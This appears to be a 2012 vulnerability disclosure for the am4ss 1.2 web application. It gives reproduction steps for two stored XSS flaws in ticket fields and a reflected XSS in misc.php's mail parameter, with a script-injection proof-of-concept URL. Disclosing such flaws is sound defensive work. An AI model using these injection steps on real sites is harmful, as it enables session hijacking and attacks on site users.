###########################################
# Exploit Title : am4ss 1.2 <= Multiple Vulnerabilities
# Author : s3n4t00r
# Home : Sec-w.com
# Version : all version
# Date  : Jul 31, 2012
############################################
 
XSS Stored [1]
 
1- Register
 
2 - Login here [ http://localhost/am4ss/orderdev.php?step=2 ]
 
3- Create Ticket and add your code html or js
 
4- Show Tickets [ http://localhost/exp/am4ss/tickets.php ]
 
 
XSS Stored [2]
 
1- Register
 
2 - Login here [ http://localhost/am4ss/hosting.php?do=order&planid=1&step=6 ]
 
3- Create Ticket and Change data [ domaine ] using Tamper Data
 
4- Show Tickets [ http://localhost/exp/am4ss/tickets.php ]
 
 
 
 
XSS reflected [1]
 
here : [ http://localhost/exp/am4ss/misc.php?do=deletemail&mail=(XSS) ]
 
Example http://localhost/exp/am4ss/misc.php?do=deletemail&mail="><script>alert('Sec-w.com')</script>
 
 
 
=================================================
 
Gr34ts 4 :  Sec-w.com Members